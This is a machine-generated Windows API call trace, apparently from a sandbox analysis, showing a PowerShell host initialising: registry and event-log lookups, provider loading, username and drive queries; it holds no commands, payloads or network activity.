	[0226.320] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.320] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3bc) returned 0x0
	[0226.321] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3c0) returned 0x0
	[0226.321] RegCloseKey (hKey=0x3c0) returned 0x0
	[0226.322] RegCloseKey (hKey=0x39c) returned 0x0
	[0226.322] RegCloseKey (hKey=0x3bc) returned 0x0
	[0226.322] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae980 | out: phkResult=0xae980*=0x3bc) returned 0x0
	[0226.323] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae9e8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae9e4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae9e8*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae9e4*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.323] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x0, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.323] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x1, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.324] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x2, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.324] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x3, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.324] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x4, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.324] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x5, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.325] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x6, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.325] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x7, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.325] RegEnumKeyExW (in: hKey=0x3bc, dwIndex=0x8, lpName=0x3582a0, lpcchName=0xaea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xaea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.325] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x39c) returned 0x0
	[0226.326] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x0) returned 0x2
	[0226.326] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3c0) returned 0x0
	[0226.326] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x0) returned 0x2
	[0226.326] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3c4) returned 0x0
	[0226.327] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x0) returned 0x2
	[0226.327] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3c8) returned 0x0
	[0226.327] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x0) returned 0x2
	[0226.327] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3cc) returned 0x0
	[0226.327] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x0) returned 0x2
	[0226.328] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3d0) returned 0x0
	[0226.328] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x0) returned 0x2
	[0226.328] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3d4) returned 0x0
	[0226.328] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x0) returned 0x2
	[0226.328] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3d8) returned 0x0
	[0226.329] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x0) returned 0x2
	[0226.329] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3dc) returned 0x0
	[0226.329] RegOpenKeyExW (in: hKey=0x3dc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9b0 | out: phkResult=0xae9b0*=0x3e0) returned 0x0
	[0226.330] RegCloseKey (hKey=0x3e0) returned 0x0
	[0226.330] RegCloseKey (hKey=0x3bc) returned 0x0
	[0226.330] RegCloseKey (hKey=0x3dc) returned 0x0
	[0226.333] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4ed0004
	[0226.421] GetLastError () returned 0x0
	[0226.424] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32468b8*="WSMan", lpRawData=0x3246760) returned 1
	[0226.425] GetLastError () returned 0x0
	[0226.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.426] GetLastError () returned 0xcb
	[0226.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.427] GetLastError () returned 0xcb
	[0226.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.427] GetLastError () returned 0xcb
	[0226.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.427] GetLastError () returned 0xcb
	[0226.428] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaeb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaeb24) returned 0x1
	[0226.428] GetLastError () returned 0xcb
	[0226.428] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaeb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaeb2c) returned 1
	[0226.429] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x324a794*="Alias", lpRawData=0x324a650) returned 1
	[0226.429] GetLastError () returned 0x0
	[0226.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.430] GetLastError () returned 0xcb
	[0226.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.431] GetLastError () returned 0xcb
	[0226.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.431] GetLastError () returned 0xcb
	[0226.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.431] GetLastError () returned 0xcb
	[0226.431] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaeb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaeb24) returned 0x1
	[0226.432] GetLastError () returned 0xcb
	[0226.432] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaeb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaeb2c) returned 1
	[0226.432] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x324e728*="Environment", lpRawData=0x324e5e4) returned 1
	[0226.433] GetLastError () returned 0x0
	[0226.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.434] GetLastError () returned 0xcb
	[0226.435] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0226.435] GetLastError () returned 0xcb
	[0226.435] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0226.435] GetLastError () returned 0xcb
	[0226.435] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xae654, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0226.435] GetLastError () returned 0xcb
	[0226.435] SetErrorMode (uMode=0x1) returned 0x1
	[0226.436] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xaead4 | out: lpFileInformation=0xaead4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.436] GetLastError () returned 0xcb
	[0226.436] SetErrorMode (uMode=0x1) returned 0x1
	[0226.436] GetLogicalDrives () returned 0x4
	[0226.436] GetLastError () returned 0xcb
	[0226.437] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae578, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.437] GetLastError () returned 0xcb
	[0226.438] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0226.438] GetLastError () returned 0xcb
	[0226.438] SetErrorMode (uMode=0x1) returned 0x1
	[0226.440] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3583a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xaeaa0, lpMaximumComponentLength=0xaea9c, lpFileSystemFlags=0xaea98, lpFileSystemNameBuffer=0x3582a0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xaeaa0*=0x9c354b42, lpMaximumComponentLength=0xaea9c*=0xff, lpFileSystemFlags=0xaea98*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0226.441] GetLastError () returned 0xcb
	[0226.441] SetErrorMode (uMode=0x1) returned 0x1
	[0226.441] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0226.441] GetLastError () returned 0xcb
	[0226.441] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae600, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.441] GetLastError () returned 0xcb
	[0226.441] SetErrorMode (uMode=0x1) returned 0x1
	[0226.441] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x324f960 | out: lpFileInformation=0x324f960*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.441] GetLastError () returned 0xcb
	[0226.441] SetErrorMode (uMode=0x1) returned 0x1
	[0226.441] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae600, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.441] GetLastError () returned 0xcb
	[0226.441] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae58c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.441] GetLastError () returned 0xcb
	[0226.441] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0226.441] GetLastError () returned 0xcb
	[0226.443] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae548, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.443] GetLastError () returned 0xcb
	[0226.443] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0226.443] GetLastError () returned 0xcb
	[0226.444] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae550, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.444] GetLastError () returned 0xcb
	[0226.444] SetErrorMode (uMode=0x1) returned 0x1
	[0226.444] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x32505b8 | out: lpFileInformation=0x32505b8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.444] GetLastError () returned 0xcb
	[0226.444] SetErrorMode (uMode=0x1) returned 0x1
	[0226.444] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae558, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.444] GetLastError () returned 0xcb
	[0226.444] SetErrorMode (uMode=0x1) returned 0x1
	[0226.444] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3250708 | out: lpFileInformation=0x3250708*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.444] GetLastError () returned 0xcb
	[0226.445] SetErrorMode (uMode=0x1) returned 0x1
	[0226.445] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae59c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0226.445] GetLastError () returned 0xcb
	[0226.445] SetErrorMode (uMode=0x1) returned 0x1
	[0226.445] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x32508a8 | out: lpFileInformation=0x32508a8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0226.445] GetLastError () returned 0xcb
	[0226.445] SetErrorMode (uMode=0x1) returned 0x1
	[0226.445] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaeb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaeb24) returned 0x1
	[0226.445] GetLastError () returned 0xcb
	[0226.446] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaeb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaeb2c) returned 1
	[0226.446] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3253630*="FileSystem", lpRawData=0x32534ec) returned 1
	[0226.447] GetLastError () returned 0x0
	[0226.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.448] GetLastError () returned 0xcb
	[0226.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.449] GetLastError () returned 0xcb
	[0226.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.449] GetLastError () returned 0xcb
	[0226.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.449] GetLastError () returned 0xcb
	[0226.449] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaeb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaeb24) returned 0x1
	[0226.450] GetLastError () returned 0xcb
	[0226.450] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaeb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaeb2c) returned 1
	[0226.450] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3257720*="Function", lpRawData=0x32575dc) returned 1
	[0226.451] GetLastError () returned 0x0
	[0226.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.454] GetLastError () returned 0xcb
	[0226.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.459] GetLastError () returned 0xcb
	[0226.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.459] GetLastError () returned 0xcb
	[0226.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.459] GetLastError () returned 0xcb
	[0226.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.460] GetLastError () returned 0xcb
	[0226.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.591] GetLastError () returned 0xcb
	[0226.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.591] GetLastError () returned 0xcb
	[0226.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.591] GetLastError () returned 0xcb
	[0226.593] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaeb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaeb24) returned 0x1
	[0226.700] GetLastError () returned 0xcb
	[0226.700] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaeb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaeb2c) returned 1
	[0226.701] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32707dc*="Registry", lpRawData=0x3270698) returned 1
	[0226.756] GetLastError () returned 0x0
	[0226.757] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaeb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaeb24) returned 0x1
	[0226.757] GetLastError () returned 0x0
	[0226.758] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaeb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaeb2c) returned 1
